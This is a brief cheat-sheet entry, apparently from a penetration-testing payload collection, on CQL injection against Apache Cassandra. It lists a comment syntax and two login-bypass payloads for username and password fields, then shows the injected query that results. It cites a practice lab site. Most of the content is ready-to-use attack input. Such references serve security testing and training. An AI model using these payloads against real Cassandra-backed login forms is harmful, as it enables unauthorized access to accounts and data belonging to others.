Cassandra Injection

Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system

Cassandra comment

  1. /* Cassandra Comment */

Cassandra - Login Bypass

Login Bypass 0

  1. username: admin' ALLOW FILTERING; %00
  2. password: ANY

Login Bypass 1

  1. username: admin'/*
  2. password: */and pass>'

The injection would look like the following SQL query

  1. SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;

Example from EternalNoob : https://hack2learn.pw/cassandra/login.php

References